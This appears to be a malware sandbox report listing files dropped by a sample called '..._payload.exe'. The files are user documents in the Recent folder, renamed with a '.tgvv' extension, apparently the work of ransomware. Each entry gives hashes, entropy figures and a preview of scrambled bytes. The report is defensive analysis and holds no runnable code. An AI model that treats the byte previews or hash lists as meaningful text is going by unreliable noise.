                                                                                                      Preview:KATAX/.n)H.....&h.s....X%....Xg.....zg,cgG...I...D....n...bi..7W#..s...~.E_...%^#...$..q..l.3#f=.1..........~..d$g.........]...0...G3.cS.5G..x.S..d..1...o.}..#..1.#c..^...y..\0.B....>.QN/k.Qki*..x...)............R7...qi.h.../<.e..........k).o..)..5.._NBa.9.~..v4'%...@.G.PD.T.SA....w.]...3...E....tp...0....L..^E........B..k. .......?..V#...m...p..........M..........l/.p..K.-^..1.{k._........4..P.S-.Ua.Z.p....;O.G....8v.1....&R.#(.}.w.\...n'.......-./..6..R.c.k.c.on8.6V.......%;..`..e.....DV..*..^.....|hsUr.!..'..!@V.qIS.cX..AV......4.n.lW...s.nF.4_....'?.J.E...........1.6US.|[I=~....``.^.,v.=.}^%..*........b?.../%.v..B..f.j..>UB.G!..... .9.q.+V.P....~&..........".XA/..]<.).......~bp..._."...]..K....7/tJ.|..p..9W...*}J.....C..[.Y8...JPa.\..>m.rN.....m.Y...b .Y. g.^.....;=...$.p....1}+..DV...n,%\*2[..nQ..ULA@.EP...-<$Yi...m.....#D=;.....R..V.n..>i.uj....m.s).X..CC.r..IR..;..n&..*9..x[.......Md../mzl.9kt..* Q.......Z,..<.B.H.w.......{`m+.>o.L]5..5Kw-

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\KLIZUSIQEN.mp3.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.863899528494633
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:bFQg59KGE395M91wY9DMmqRhVv8Gp20TDZ59OGw7qO+VFnkrTv16v6bD:JQOvE3Swvdv9pfDb41z+VE16wD
                                                                                                      MD5:E5F38F06F23C4E47D26257A1AC940CC4
                                                                                                      SHA1:84CC3088B31CE1F25A54ECB9B6CD6B28BB425EEC
                                                                                                      SHA-256:154B775C3900E6D1FB6E94186B9BCB34174D78206F14F188BAA8CB28DA2000B5
                                                                                                      SHA-512:9D5FE02642475E2BE980ED853515C8B6B83B1D2EA31BB25DD4576C6BD360E21288354C5EEDA111FD8F4A54677AF028E1DDCA980E6C54AA6819C42BFD84C73B34
                                                                                                      Malicious:false
                                                                                                      Preview:KLIZU.v.29.b...W.1S?....(.'?i...B|Q.Xc...e.z.Z...........)o[....8q.,..z.f.`Q..l@...('.5{.5V.p...... ..dQ._pl...f.7.........y.h.<...=....*....q..Iy.^.~CW..bJ\1......j.{.\PT.?.By..S..........|..6..]d.......U...Q.1.`.8Te9R......w...{ES..$w....Jc_........d>&5#t"..IH......c...bgu.[R,$&..|z..8.S&...G...~.B..no.bM\......h.L.F..Z.._.....W.y. .ly....ax..e...7.sv^(..s.2.3.N.d..T..zH....i........G..~..Z......./..=.,y,_..Q9...T..l.}P..+.\..{]h.....N.Q..TC....]...Uj..}....:[.HCJ.^...$B.~ .0.N...3b......K..q......*.UkO...W..akJ....~.l...N..."u.[2.4..k..K.......,..Hp......r....?5.bI.@................bS.o...v....X...,P]cH.5i.v"9.. .R.LV..z....\ZB....V..IU.W!.9e.Khl..>1.nU....rOY.B+..*dy..l.......2.......N.z*....3...V2.rV..{n..f6.$......Y.X,...a..v.4...!.MT..K=_.b?.....$.`..W..h..o.|P.g[@.3a....vJ4.?[....w...CV..)..}.....h........2...f...I..P...Rk.C..x...a7z.....N.....W..K?b.k...T!...<RQ...R.4v..4..OL.>..z.iG.%a`wj....3.U.[v?....?A.9......0.*.V.3..\L

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\KLIZUSIQEN.pdf.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.848652591146595
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:bjoJkHjylvlUV9Yex4BJyfwn0gvV9gxuGAM3wXZADBe6PDlTWv6bD:/omDyplUXYe+yTg/gqpqDk6PDhWwD
                                                                                                      MD5:BC7CF74CE4AB72A2E8960A9D95D057D8
                                                                                                      SHA1:10ADABE86F4D632FFB1EB1D1856548205A3EFA2C
                                                                                                      SHA-256:E9B67EA41E6F33F2AB3DF293353AF7A7FAC1F7FECDC1EBED470B9057FCFA734C
                                                                                                      SHA-512:AADC763C6941538275A439AE9F5BDB437A6611DD091077EF673D0DFFC863F8048F2362417B1DB9D67971C8FFB93EF2E237870525E112EEB5B264D3359971AE07
                                                                                                      Malicious:false
                                                                                                      Preview:KLIZU|..t.f..]E;.v.u...x.....Byj.6.R....g"O.Y....;.....dC...H.:|T..&..Y.a1n.L..Y..w ..e.]...eC.9...&.G...T..!.M..M.k.....".....+7. .o..2..a!.U|.gD..3.nb\z........W[....'...}P.....ny.^.....i+PG.o......u.yx......[..Z....~..Z\..f.W)j.5.....23/[.......V]V.A.QD..S.m............%.[#...N...!...n...Y0.....pB`.^.Dd%;)..N.6dv...F/.W.e.W.|u..L%........._>........}....4..a.....D.|....k.`.+c..6..'.mhh..B...........&....*.&...&......Q.....6....k.x5..o,o...f....g)....27.......CQ7.......l..Np..:{-...E....X.....N......N.....*S>.CX=...z.....X...EyX....8.F.Jq.N...C....\..l.cl...U...}....5.t..h.A.v..0.)@...za..p...o.$ z........M....z..b..,..EX...)...|?.+.#.._,..R&.@.\]f*...}.de?.0m..k.9n]'j`..k.f...].p.%.0..f.U..U"e..@.O.T.].X..8.gy`)..OB...P.X.d.pS..w..).......;....A...}.:...U......Rs..V...E...8K... ..x.FU..>......p.BC..e...oV>.j;...YT`...VOi.......+0.j....&o..#\@;.g+..7. ..'.C...4^...-U...k.O..w.h...-^.r>......Y.b].z.....Q[.+E$....

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\KLIZUSIQEN.xlsx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.857239550221158
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:bzb8l8tGlM5IuM7aclwup4kf1ap8q9yMqpnu3Io8go4LeZLadUh94Oy/qv6bD:/mjMfsaGwIg108YPgo42aUhuOySwD
                                                                                                      MD5:1E9DF6A1B593899A5D729F4E2DD03BBA
                                                                                                      SHA1:595A8B4240E5D0AC2D0296A4DD4F31C28740F0DD
                                                                                                      SHA-256:F098AE1AE1D951B864B007AF818D21D2EA911BB96268D0A25C9DE637BD4332A8
                                                                                                      SHA-512:8B8EA3CE441A71BA54E0DF7AD5506F9A1CAFAFB3B85522171E7FCFEC3DFF6E3782029A74B33A548F5DE4E101C49B4EEFA2B9C297EAB03BDAC3424D1CED349EF6
                                                                                                      Malicious:false
                                                                                                      Preview:KLIZU,.@.V.Q.z.1.$....'._.A%....TW.7..Hf...<n...7Z.$.-.|...........'uk4.4.B%Z.sz......:f..%.b.A.z..}.2....U,...b=..Y.q#..R.[1L.a..{...N$rIb.z...^_....(>..Qp...+..!C...5....eN[.v...k...\*...=..,.>....M.t..:0nv.P.0.\."j...+.......s...g'.$.....H@...L.....'........c.S....s8...9.X................@.....U...L^..../.L..&.'..o.m...Q.Dwp.Z....cm.......\...s...%m...f.>...P.&..J.._&.mG.\x....)...j.3.....\#v..%..j.8r.Z.1.{.G..M........s.Q!TQ..Q.>S...G.o;\....V..)...)./K.m....c...*_..6..C.'.i.Z....XB..o..:..6.R..d...@.Oy.YL....P..y$......K#.#..D..S.h[$.K.|..7.q`..Iq..Z...m..O..D..-...i..C;.e1..%d.....B.T.r...A....).....}@...9P.a....3*SI.|.Uj.....:u..^..% ..Euxu.F..l.zP.K.$..k......ud.!......+....0.....B!.%.*.<.e.W...ZYu...._.{...z..a0Y...V;n....+GJ...#...^..J......F9.._.B.K.I..z\..$...%ms{..}g...P.Nu.....@x.W..p.n..z...94.~......`A...w. 2...W\......R..N`o,..A.....xj.QJ..p#5A...ZS.|..1.0.f&.,...3.....(.]#V.,..<Y.Nnn..6.A../7.n.|.Y.E.7V(s...._....P#B..+..

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\KZWFNRXYKI.png.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.83941624948145
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:OOPvTwTon5Zq1rBZZC16RyFWeWuhWTCrc432ilqg0Xnv6bD:DHTwTYjqZBZuAydWuhhc+2sCXwD
                                                                                                      MD5:F00A1865B0FA8F8B3E9733AE213CFD5C
                                                                                                      SHA1:49766354B928D20F8AF5D72547C5C791AEC142D0
                                                                                                      SHA-256:8723DE2E2580BA37F9096DF3AAC09971C0FEA023CA8024EAE2CB0C6A52372B43
                                                                                                      SHA-512:111CCBAD44ABD7BA61BF8A3012ACD7E4ABA208272C4E50415F807FBA25626ADBACE50D5A214F1FFA13EE6E37A927357D5ACD4729AAE08ED0DE14A434EF9A32EF
                                                                                                      Malicious:false
                                                                                                      Preview:KZWFN....u\s....5.=...@.^~...F.'.W7... .6...=2.@.!.M5.u.Q&]....u.\.R...l.".....9..+..Q.E..z.......[z.N.r....fg |.l.^.Om.....A.X...o'..........J.....2...0D=.!.A...6..f.\.(.......c.{vk..._.5......aR...H..*..4....'........<....-./~.;.w|..%.w.;..C..!X..,.(q.x..7E#_D....U..+......f..;".XN.`..X.....S.I.0.......K....^ ..|..x....../.b1..yD....m4e.Y..0.J...(..$p.K...)...\|...u....9..Q...T..oZv.......u..G.mX.pm6...Vb...k.=\..W.....i....0.wwad.`.J.c..R..(..M.].bI.}.w_6..~e.z...\<.......S..7.@..Rg"...E8.(..;.cN{5$. J..9.......X..2..t[...i.....\.vF..P.o...O.].....WF.j.$...=.Xc.8.Z.B.......xA.l.IE...R.B.a....].j.,...8!.e.O.g'...[N..g...V......Q..@.=...X.2..9....N^.....wi..a.)/.....\.:tc..Ni..,..!"GQ3...t..(.C..cl.....x...*\...(..`....Y.`l<.r........w.Z.x&.Iy.Z..h.A..zs.V..p....#..q...w..4..g.0.",.*$..$}qOU...A.f{8...^.n|9..6E8.<.;s./eg.....O;.k.1.....c06..D~.>5..`4..>....B.......a..2.......~.x.5e........xN.. .i..;~..w.m.<.N5..W....~w.........].._.&..

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\NHPKIZUUSG.docx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.816160773562347
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Bj//KyCyNb0NdDm8jJ+3Jsnpbc75NoGZG9xqHnY43xzFw+fYNVJlZVv6bD:BLCyCysDmj81c5OP9IHY43Hw+gNnlbwD
                                                                                                      MD5:3B15E90ACB8175C542B60DE7E3A6FD94
                                                                                                      SHA1:591DF749A9DBCEF7C174E36BB2CFDC9D509D1783
                                                                                                      SHA-256:02EF63AC96F1418D5354861210E3E094B78F2B1B769B02765D853A9724AF3675
                                                                                                      SHA-512:648E5E8F67EF865637860B441318DB9E515E5FDAA8C07B7BBE50A28B94C6014BD6C510A7E6BCB0E2DB2B7B08ACC636A027FC54E825DCDE60CC018F0B97E978A4
                                                                                                      Malicious:false
                                                                                                      Preview:NHPKI.....>.........S`..$...7.n..]C.'.<.=..........D.W..h...Hs.op...U."..?.Z>..:W(.n..}..$..[.~......x........}..\.F...y.{@..b..0.=.'..NF..5....e......-At...............e.....HA...].[Q.....^eiD9...%hu....y..d..`.{.qY..:.{\..U .n...Ib8..X'ci.... .d..J..e.Z=.#.DR.......h.E.n...=!8}.]f>.wi..+....w0.7.%..}.I}...@.=..!.x,.....M9.y"...k..s:J....0^.*....H.t...S...8`B.D.....r..S;.=\-p.......px......q....C..I,fq.p....a....}../..2.....j\G.|..P..M$...2...Ly..9..........%U......\...3..........7.Z.?.......X..'.Jr.....p.v.[/E.iA...C...,...Np...!.t}..7j.......,.l2E.~R..=.....a_...4C..s.jJ...q.e\C[.^..8.D.....N..........7X.+..5+..nD*.OW~....RUP.+.g.x..3..j..Q.E....r.u.W....E...HVg....r..h`].W8..(X..}...Z.B.~.3MN.-j.......2..=.0n.V(..$O.-.$.sty4.eCB.7O&$...b.j.O....x<t...e....O4?B.".....$n:.`........,@.......<........9.D!..qljG....B=..DCW....;..p.........L...B.c...*.a;..U.EG@..3=t.+...l..aj+G...$.N...UV~6.T.e2..W +..M.=J.>..aC....!...>.cR6.....Oe.c.....12

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\NIKHQAIQAU.docx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.839613028847706
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:6WM+xpVl6DPhJIXc8gQTOsbjlqxkhcMMj4q9w3flnSgFhcFrv6bD:htgIs3PiIxkCLj4JtSgFhcwD
                                                                                                      MD5:67EB2D9C1B7EE2309AFA960D3C92DBB7
                                                                                                      SHA1:645FCD7739B8AC289873BE8F90F9E211FF5B4A98
                                                                                                      SHA-256:E447EB1FB047433BD1D6D7E89A27A49B890C787DBBAED12D6F3D842B666BF4F8
                                                                                                      SHA-512:D6C3EC39A067E2A04522351180807F92B49F9D1DDE32C728B2062BB6B195E16D6A664F3077A615AF4D01808E8514CEBB93B684F14C11AF57435DE805C9FA0F6A
                                                                                                      Malicious:false
                                                                                                      Preview:NIKHQ......4....n..=..2..'..%.o.=$.o+.Iu..v&...3..~..\..y$4.N\M.......a.....d.......N .2.`..l\.,Y....6....!.........P.0..Cw.r..y........=...<u..5.g=b....X..7....e......&.p)L.W.@#.........LV.t.+.m.\..Y.>.}.8.).....o...k..$........Z.9E.T0......ri/d.......M..{.9.....g...\8...GB...$.....o-.....{.1..JD....r..L.{..v....3.Z%..x'p.)5x...).K.y..:<{+n.c1V(,.>.A...C......g.O[......r...wjg9....ER.....\._|..`1...x....+....UiA.oqv..x.ew..Cj...u.......5..T.J.e..j.vb:..-..-.Qn.2.......U?.\B...];7.....=X:w_$....40...8...mnQ..GM5\9....~.m..1..TW;s..c........E..C.:.R..Q9).....~...a..B..\Ic.!<.-.%l.m..O.V.n.A..]m2\S...j......v....k0 &.82\..,..V.Q...A...B3B*......u^6.......u..v2.C_a.....t...Ji.?5dux...........?..^Ee.....R>AT8Z......'."O.I...:.x...a.1....k...K.;].~.I..&v...#.`...:...}...38D.e.v.h...#%Ea.?..$.p...[........g.X....C.U...*,OS.^.se;E....@.l&@PA..M.^..F...B@....#..x/........g.ck}.E. ..\...Ll..i;x.j}HD.?*3...wZ...DH..F..gT..w.F.a......V.?....<..y.)

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\NIKHQAIQAU.mp3.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.83481378616966
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:AfvGfovf0Yjo1rWn/FdcWVqj/Yc1GC3XPZUXyGKbdcPuARVhjybhGhlv6bD:A2+M4o1an/FSJgc1GIZQ0O/RVlychlwD
                                                                                                      MD5:315A5F892F5119EFF465F9975CDC478B
                                                                                                      SHA1:6038DDF35008E4D763E2C8AA2C9277CE0A91B11F
                                                                                                      SHA-256:1FE3865E4AFE1E438006291F221C866E3A7338A65E15ABDB49A256A65234E6D7
                                                                                                      SHA-512:6FD4A467899FCB731F7A865AE441465D7C245BA8F947EDA26282C58CF29A19FE8A041D51F126691CF3286B7D9361F1D8D6BC7087A1719500C82A5DF693BC14B6
                                                                                                      Malicious:false
                                                                                                      Preview:NIKHQ....Y..gR...9.>.....<*%....fA?..*l.'....CUN!..J.1..U...0.>Hf..&&.+S...wKr..;..&....P"...KMdzX;.0.5...>@...z=.l.*&.l...Pr7a..|".....Q.1\}.R.g.*&.S.Np...E|.2>.P.;....F.....H..........g...IJ...kz|...L......(x.....$<f...i....^1.{.....y..........-6..W..Z5u&.!S...T....?.7.;gr_..>.Z.S.hBTL9.uF...p,..M}..$..Hiq.L..PF+.w..1.c...zJ.>...:.$..E./:b..h..;..Q.>=.'...8w=....KD.>N.~.i....nm*.......JT$@>%....;...B.".c...?%(.L..{.zu...E.....%.et.......u_'.Y^F..>....(..~..|6Z..z.C.!..rg7....mM.0.{..t!.'.g...Gs....W...Bd.._.z...}:8.}...nHI...g.0(........{!_Y......O.+..|...Z..{.n.b_...mnM P..}.Ob.1.B.Dy.Y..e.#Gr+".7y8....6..?+@K<*.w.....^,,/....\..gF..OP...3.ti<.9i~(b6......m4.T.[.......H"R...K.,dZ5:.......e..}.E..x...9.f..[.g.?...j..|.....<...t+.m].R..#,Rc.....Z.=.Q..2.-.X.cK!..[0...h....u.k...9.iGs.O.K........H.5I|...I.D...c..-..ai.e-bX..b..%R.......qM(..........F>....?F..,wJ).. ......\..1...[...........u.X....D..4...k.WS.'f.....j.\i|..,2Lk...T....7....24.U.

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\NIKHQAIQAU.xlsx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.838442451691629
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:T4dqpophIseVWF4OSxaaH9PXi7tCQYXDJt3rOKRTz0odY5zILm7VpFDN+xXoqv6X:U1hbe64OS8adtnr3RCzJ7VrDEx4qwD
                                                                                                      MD5:3384C52928F7399C2D2F07BE95C64D14
                                                                                                      SHA1:D7F6B318D97ABD790A8A82C2A0149470651418C9
                                                                                                      SHA-256:F401408071FB0D73094AAC44B31F2A806F1C404B6654EF75E126512253DDB922
                                                                                                      SHA-512:753C03FE85DF52D0A1119F12FD87E34F2524BD35A4A938205038743C6B99450EBFB3784C6788FC62E740EC4839F6438BCD0BEBB46F67DD20F8D910B9F3920BAB
                                                                                                      Malicious:false
                                                                                                      Preview:NIKHQ..~,.{..\#...,W...*.t.:Vt..Cz.o@13......I....L.&.(.....g..}..iG@..K..^GW.>.=..07c*....E.J.Y[.1|../.W....`..m.u..z.....5.3.UW...eN.F...a8.........%v..%.~.yr7.....j....{./.d......."9/.F...;...l/.*.A,.B..%... .U......Uq.E.,J..j"fR.@h#....62...a/s.-......cx|.b..1`c.m.5.j'US.....?......@..H /.D.gs7........M.l...:5......DX...7Oa..eHy.WF/.....uW..k...k...6%..=.:.@..7..KD....>@.......dB...;.8.+|.\...[p+`f......H.a.,.6)......f...P..K.r.=.....2.E..FQ...s.......<s.ym.&vG..~.....0..e/......ghf.wS.\..m}.54...v..7_'...Y...w].U%.RB.A..U.j.......[.....1.]....Kv...(.v1EY../...3...f.24'..rolB.5.X......S..`xc%~...P....Qs=....lm..D.S.'....OPJig&O.9.q8.#....,#..l!.K.d....$....6.r.v..N..@F........X..y;a......OR...{1..a..,uzU...~>....v...`..m.&.r.LF%...".y.l.7..@.a.t.Za....T...K~...$.TG.hg...kM..8.5.....[.2.p.P....Hw*....].CE..J..=.0-P...M..8N....]...8.[.|.0....D.&..+....M............>y..0?u..............;.A....xd*.t.eo.\.9.D.~.L....~.....m.t7..q@.g......*L.YU.>..

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\NWTVCDUMOB.jpg.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.852768161556921
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:R6Q5+TWfMZs4ftwvS6ArEGaWEDswRfrFS+Mj4B5uX8leGMmY7xjKR/DW0Zv6bD:wqDfiFtwArP52j5R8C0XGjQ0d6KwD
                                                                                                      MD5:3DBF6D87F8BD0532C7AD64DE9BF3E151
                                                                                                      SHA1:804FD497915E4693BE676F635C72F7AFE0C75F39
                                                                                                      SHA-256:6CD44092E07414AD64DFE28F85A246210C6DE4C578D4B43413BC487FC3506EB7
                                                                                                      SHA-512:A03F3AD23063519CE6578B7041ACF863D676724470745AC9F8393EE36AB9AEACB32D03508AE1BD091E5A5D8EADDE1F8957CA1B3DB116253B3569B5FD215094D6
                                                                                                      Malicious:false
                                                                                                      Preview:NWTVC*dUc...J.W..AnN..o1..>>....O.4P.32c<.W..E.!M..UR.5x"|yo...%M.L.. .. .A..V...:O.*G..t.i........$AQ.)?.q..}-_...d.S.A...._Dt_h.].&.W..N....%6[o..q...vtD./.v.Y..^...&".;.. .!.!dJp.T..B........i..j.......j.h..d...lv....D..jH...X..D%.....~8.'j.*..5.'...`.!d.8.B....V.p.+..,/..]. ..^.A ..x......o...#.*6yE...<.@...C._.v.E.[..L...RG.^..A.o..v..2~..jdr...Q.#..N......2..f9.8w...._..).6Dq.....A..pi.$.1vr..=!i...Mq..s...%t..gv.jvf4%.C..9.VA"d.p2..76...6L+tk.T.Z..~.+^2..c"i...6.E.z..?$.@..C.{U.......,.0.{...Z...54.!..\zD'. .K.L....rD7b^8f..;..........[$....71P*..r7mO.;....}B5........o....u.r...h...>..S..q;.0..=.[...!3...h.~..Y.{[..\.=.w...f..v..G.H.D.ET...........f.tr.......GC..s.[.L..-.z.J.[..X./*p...?.y..SX......O3.1.N.......[.i.... E.......bJ.IS........Sp...*h.6K+.....I@....Q>......W...1K..B.|'.\.J.....#..Z....q;...'.H38w*.>yT\XW._.&....;8..m4j..K..&'].|.g.v....L.6.|C..*tZY....T.8...b.n.P..*c.j.!4..K.mFqo.....Z.W....]...d}^5...,.{.X.C#.(...

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\NWTVCDUMOB.mp3.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.855149801304833
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:JTdqqmRZMG9gEbjZYSuWnwIMM1YxZgEJjpOVTCd0dSu9v6bD:JcqmR3gEbjuWnw+Yx9Fd8wD
                                                                                                      MD5:815A67889AA7D7CD3BCD29C46D59E3D9
                                                                                                      SHA1:F77563108E4A14ABDB97D9F1230C9E1D9EF59FBD
                                                                                                      SHA-256:57369C5E6CA2E0CD85248A6D7008528E1D51C2E847A1CB0076050779525A4E11
                                                                                                      SHA-512:9A8204D8C814AA9B3E08665771D0FC424158E82ADEAF618558DE96FE92A2DAF00294769D5EEC9E61BF584854410506C6F8005D5277E460AD14A6C5DE8A95C925
                                                                                                      Malicious:false
                                                                                                      Preview:NWTVC...*%Lj.O.$[.W.....4+yy.,r.}.l&.......@x......#.Q...i.c...b45..+P.Ui.....h.x...Z..H.O....s..2.m..S.4..E..as[.&i....a.oH.T.V.%?.ho...!3I6{0.J.a.......t..D.....Au..g..p~..C.0y.W\/...B(.bL........j.?.IX.^....... .)!.........S@.|/2....J..Cy..~.....}g.6.\W.>.N.J.p.1.t.N.......(.v.w.8.{..3).M...#...7.[.../e..h.O.B...-..8..y#>D.zA.z.3k.,F..."....U...@.3..^..a{....nCH.._.o&.qze..:.=X...Q..RC.4.v8s..2.uI{..D...x3@.1.T.H!.*.e.kp.xO.l>].*...~.S|BO.W..>.u...xql..".z.....m.e..@.._...Lr....c.l.-r.8kK{J;...LM...A....F....^.thX..Tn....Rg.....CUyC.Y|....X)Y:Rl.]&..;.z..)9...6L{k..I~2.^....U..',T.E.K....#...U......0_.;.J....X.e7....MA.>.-...'.Ha,.-.i.'...Ql.Xm.i..G_.$_.J....&.y....!9.w.[.I$!.....Z.........@"9../.Jq.s......j...4...\iW../@.J.-...9.<:aln...N...d2...q......_....}......$...k.+..;..\8..v..V.7F.....Mi.Ly...@"....C..0.0...=... n!...7.d.9...P...p..M$.W.....s.H.F...w...N.......B.w._......a.H1..9f.k.)h.c..n{.m=.a. ...|..{..E..d...0.z.#. .........|..})M

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\NWTVCDUMOB.pdf.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.84399333182094
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:bRa6AqUzVi5RzGWijDEAqub/azD4tAcoF+EFfvCQoI+HkZ2OSz6sZVSob5OLv6bD:bM6MEGWijIAqgG+foF+8f6bg2hzhVS6R
                                                                                                      MD5:F827BACCFDF88F4D1D2243CC969A061F
                                                                                                      SHA1:0AEE64D90E006D3A1EB2AD5F5A5BDFB0D5666692
                                                                                                      SHA-256:5D63DB387AF614629E92EEDAA410E073B6D4133740E31E3145F45B0192175552
                                                                                                      SHA-512:57033D98DC41D94551A3C505D7BE8C7E18007EDE1F0F0C2099B27863199D5DD44F324665A0AE58D2C15AA4F4593BBF92821096CAE536FD7287D9028387919AC5
                                                                                                      Malicious:false
                                                                                                      Preview:NWTVCu.p...^..ng.}..1+...B......q......^...g..b....[2$.m.3.......E[{.H...|.j.R]6......./S..s9.p..=....J...Z......7...6.2)d7.................m......*.~uV.*Y.J...eB....>..:.s..H..v1C.9P../..........-Pi3..D$.....qcqS.n.{.~oi.ZZ.n"...>!..@.....R.qq...Q.!T.(.....[....`1.M._..].:&...BrcP.FgO.PA.h.|..t...B.!.)........J..61\.....L....O|...jk..Y.$.wM..n....~G..@|..Pw.x.U[....8=]...~..UD.N........R....v]..-.."0..%.I.f....m....!2n#...z.......tq.U...g'].pt.9......+...P.h.y]<.v._..|.W.`..7.'E......?...+\.a.\3SyE..$.F..8...SL.P.%.);F.)...7'.].D.....=.......=7..Y..c.F6..^..7....E1.S.#A#..m6.O..#....[.D.Q..Ff...X.ON{i....J.:.-.F..M+.G...8.s.$=.uk ....o...:P`.WYC....m.8'..G$.Uy......T...].......4v.7..e.m....7\2...U.1..t..%..YH1.M.x.D....,..l...p:a.B...)..\S...c}OR"b.....6....G..X.9.,.C..[#......H...9:!.(f.....-9...M..f..!...wZ.>.N4(-.V..n.4...k..j...uvE..E..Ze..4....T.X....r9..\.R..9Pj..{.xd..3F.~{:.8.n.U.2.#..i|B..k....<.[.N.9...s.f..O..*'..PO.n

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\OMCLGRQDIB.png.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.863411774619105
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:L31ttIbXf02rLroPByJorQY+Qua8O6UbXWuj5LJDi8YHjln4tv6bD:D1tebXf02nrq0KZuOb9YCtwD
                                                                                                      MD5:EAD93F2AA7E2D8197FCC69F57BF4D1C3
                                                                                                      SHA1:E94DB828F5E9D1719C9A55C2F1467CAE89920BCB
                                                                                                      SHA-256:9E2399454CD7705803C3B6B35BE6B291AEFF50812E9D423C33F2FB836AD67055
                                                                                                      SHA-512:D8E01FFED0DEF2A02F1249605C87081705CCD1547327AABC0A76F358D5B4AE8B9DA312DD49482B82338F975DA987B0541E0ED3A8F30765A6057C8BD0A3443E92
                                                                                                      Malicious:false
